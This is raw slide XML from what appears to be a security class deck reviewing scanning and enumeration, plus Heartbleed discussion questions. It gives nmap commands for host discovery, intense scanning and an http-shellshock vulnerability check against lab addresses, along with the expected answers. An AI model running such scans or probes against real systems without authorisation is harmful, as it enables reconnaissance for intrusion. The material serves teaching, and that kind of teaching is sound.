                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> 10.0.090</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. You’ll identify the hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2327" name="Google Shape;2327;p134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187" y="196782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dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> to perform an intense scan on any host you discover. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2328" name="Google Shape;2328;p134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-212" y="2495063"/>
            <a:ext cx="9144000" cy="780600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -T4 -A -v 10.0.0.100-101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>You'll find an Apache server on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.100:80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>and interesting information about the SSL certificate backing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101:443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2329" name="Google Shape;2329;p134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-188" y="353572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dirty="0"/>
              <a:t>Test hosts discovered for vulnerability to Shellshock. </a:t>
            </a:r>
            <a:endParaRPr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333"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2334" name="Google Shape;2334;p135"/>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Scanning and Enumeration Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2335" name="Google Shape;2335;p135"/>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dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> to perform host discovery on the range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.090-10.0.0110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2336" name="Google Shape;2336;p13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33</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2337" name="Google Shape;2337;p135"/>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338" name="Google Shape;2338;p135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1187213"/>
            <a:ext cx="9144000" cy="780600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -sP 10.0.090</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. You’ll identify the hists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2339" name="Google Shape;2339;p135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187" y="196782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dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> to perform an intense scan on any host you discover. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2340" name="Google Shape;2340;p135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-212" y="2495063"/>
            <a:ext cx="9144000" cy="780600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -T4 -A -v 10.0.0.100-101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>You'll find an Apache server on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.100:80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>and interesting information about the SSL certificate backing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101:443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2341" name="Google Shape;2341;p135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-188" y="353572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dirty="0"/>
              <a:t>Test hosts discovered for vulnerability to Shellshock. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2342" name="Google Shape;2342;p135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12" y="4059600"/>
            <a:ext cx="9144000" cy="780600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status.cgi 10.0.0.100,10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>You'll find that 10.0.0.100 is vulnerable.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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346"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2347" name="Google Shape;2347;p136"/>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Scanning and Enumeration Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2348" name="Google Shape;2348;p136"/>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Solutions to the following questions are found on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0366D6"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Heartbleed website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2349" name="Google Shape;2349;p13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34</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2350" name="Google Shape;2350;p136"/>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351" name="Google Shape;2351;p136"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Why it is called the Heartbleed Bug?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What makes the Heartbleed Bug unique?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What is being leaked?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What is the leaked primary key material and how does one recover?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What is the leaked secondary key material and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>how does one recover?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What is the leaked protected content and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>how does one recover?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What is the leaked collateral and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>how does one recover?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What versions of the OpenSSL are affected?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How common are the vulnerable OpenSSL versions?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
